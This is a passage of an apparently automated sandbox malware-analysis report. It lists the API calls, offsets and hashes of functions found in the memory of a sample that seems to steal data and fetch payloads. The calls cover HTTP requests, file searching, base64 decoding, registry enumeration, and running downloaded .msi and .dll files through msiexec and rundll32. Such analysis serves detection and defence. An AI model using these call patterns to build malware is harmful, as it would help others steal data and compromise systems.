                                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                                  • memset.MSVCRT ref: 0040D388
                                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 2775534915-0
                                                  • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                  • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                  APIs
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A51
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A68
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A7F
                                                    • Part of subcall function 00B34A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B34AA0
                                                    • Part of subcall function 00B34A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B34AB0
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B35C5F
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B35C7A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B35DFA
                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 00B360D8
                                                  • lstrlen.KERNEL32(00000000), ref: 00B360E9
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B360FA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B36101
                                                  • lstrlen.KERNEL32(00000000), ref: 00B36116
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00B3612D
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3613F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B36158
                                                  • memcpy.MSVCRT(?), ref: 00B36165
                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00B36182
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B36196
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B361B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B36217
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B36224
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B35E5F
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B3622E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                  • String ID:
                                                  • API String ID: 1703137719-0
                                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                  • Instruction ID: 02696678f05d999bd258f36edd6a2217b75bbef4093b242527d96cfec78da305
                                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                  • Instruction Fuzzy Hash: FA12CDB1990218ABCB15EBA4DD95FEEB3B9BF14700F5041D9F14662092EF702B88DF51
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 00B3CCD3
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B3CCF0
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B3CCFC
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B3CD0F
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 00B3CD1C
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B3CD40
                                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 00B3CD5E
                                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 00B3CD85
                                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 00B3CF09
                                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 00B3CF20
                                                    • Part of subcall function 00B3CA87: memset.MSVCRT ref: 00B3CABA
                                                    • Part of subcall function 00B3CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B3CAD8
                                                    • Part of subcall function 00B3CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B3CAE3
                                                    • Part of subcall function 00B3CA87: memcpy.MSVCRT(?,?,?), ref: 00B3CB79
                                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 00B3CFC1
                                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 00B3CFD8
                                                    • Part of subcall function 00B3CA87: lstrcat.KERNEL32(?,00420B46), ref: 00B3CBAA
                                                    • Part of subcall function 00B3CA87: lstrcat.KERNEL32(?,00420B47), ref: 00B3CBBE
                                                    • Part of subcall function 00B3CA87: lstrcat.KERNEL32(?,00420B4E), ref: 00B3CBDF
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3D0AB
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3D103
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                  • Instruction ID: 768524def123818276f6984c5023fe8cdc8a4bcf8f2d4a53738c9b5e53665a36
                                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                  • Instruction Fuzzy Hash: D9E1FEB5980208ABCB14EBA4DD91FEEB7B9EF14700F004199F146B6192DF346B89DF51
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00879480,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                  • StrStrA.SHLWAPI(?,00879228,00420B52), ref: 0040CAF7
                                                  • StrStrA.SHLWAPI(00000000,00879348), ref: 0040CB1E
                                                  • StrStrA.SHLWAPI(?,008798D8,00000000,?,00421458,00000000,?,00000000,00000000,?,00849968,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                  • StrStrA.SHLWAPI(00000000,00879738), ref: 0040CCB9
                                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00849AD8), ref: 0040C871
                                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • StrStrA.SHLWAPI(?,00879738,00000000,?,0042145C,00000000,?,00000000,00849AD8), ref: 0040CD5A
                                                  • StrStrA.SHLWAPI(00000000,00849BA8), ref: 0040CD71
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                  • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • RegOpenKeyExA.ADVAPI32(00000000,00877198,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                  • String ID: - $%s\%s$?
                                                  • API String ID: 3246050789-3278919252
                                                  • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                  • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memset.MSVCRT ref: 00410C1C
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                  • memset.MSVCRT ref: 00410CCD
                                                  • memset.MSVCRT ref: 00410CE1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00849958,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00844840,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID: .exe
                                                  • API String ID: 1395395982-4119554291
                                                  • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                  • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID: image/jpeg
                                                  • API String ID: 2244384528-3785015651
                                                  • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                  • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00411307
                                                  • strtok_s.MSVCRT ref: 00411750
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00849958,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                  • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell$lstrcpy
                                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                  • API String ID: 2507796910-3625054190
                                                  • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                  • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                  APIs
                                                  • memset.MSVCRT ref: 00B44505
                                                  • memset.MSVCRT ref: 00B4451C
                                                    • Part of subcall function 00B49047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B49072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B44553
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B44572
                                                  • lstrcat.KERNEL32(?,?), ref: 00B44586
                                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 00B4459A
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B48FF7: GetFileAttributesA.KERNEL32(00000000,?,00B31DBB,?,?,0042565C,?,?,00420E1F), ref: 00B49006
                                                    • Part of subcall function 00B39F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00B39FA0
                                                    • Part of subcall function 00B39F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00B39FF9
                                                    • Part of subcall function 00B39C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B39C53
                                                    • Part of subcall function 00B39C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B39C78
                                                    • Part of subcall function 00B39C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B39C98
                                                    • Part of subcall function 00B39C27: ReadFile.KERNEL32(000000FF,?,00000000,00B316F6,00000000), ref: 00B39CC1
                                                    • Part of subcall function 00B39C27: LocalFree.KERNEL32(00B316F6), ref: 00B39CF7
                                                    • Part of subcall function 00B39C27: CloseHandle.KERNEL32(000000FF), ref: 00B39D01
                                                    • Part of subcall function 00B49627: GlobalAlloc.KERNEL32(00000000,00B44644,00B44644), ref: 00B4963A
                                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 00B4465A
                                                  • GlobalFree.KERNEL32(?), ref: 00B44779
                                                    • Part of subcall function 00B39D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B35155,00000000,00000000), ref: 00B39D56
                                                    • Part of subcall function 00B39D27: LocalAlloc.KERNEL32(00000040,?,?,?,00B35155,00000000,?), ref: 00B39D68
                                                    • Part of subcall function 00B39D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B35155,00000000,00000000), ref: 00B39D91
                                                    • Part of subcall function 00B39D27: LocalFree.KERNEL32(?,?,?,?,00B35155,00000000,?), ref: 00B39DA6
                                                    • Part of subcall function 00B3A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B3A094
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B4470A
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 00B44727
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B44739
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00B4474C
                                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 00B4475B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction ID: 34208a9acc6c82ec8473c9e8e81393bacfa2c708dd57f2c8325a08ca7fa6113a
                                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction Fuzzy Hash: 4A7150B6900218BBDB14FBE4DC89FEE73B9AB48300F0085D8F60596181EB75DB59DB51
                                                  APIs
                                                  • memset.MSVCRT ref: 0041429E
                                                  • memset.MSVCRT ref: 004142B5
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
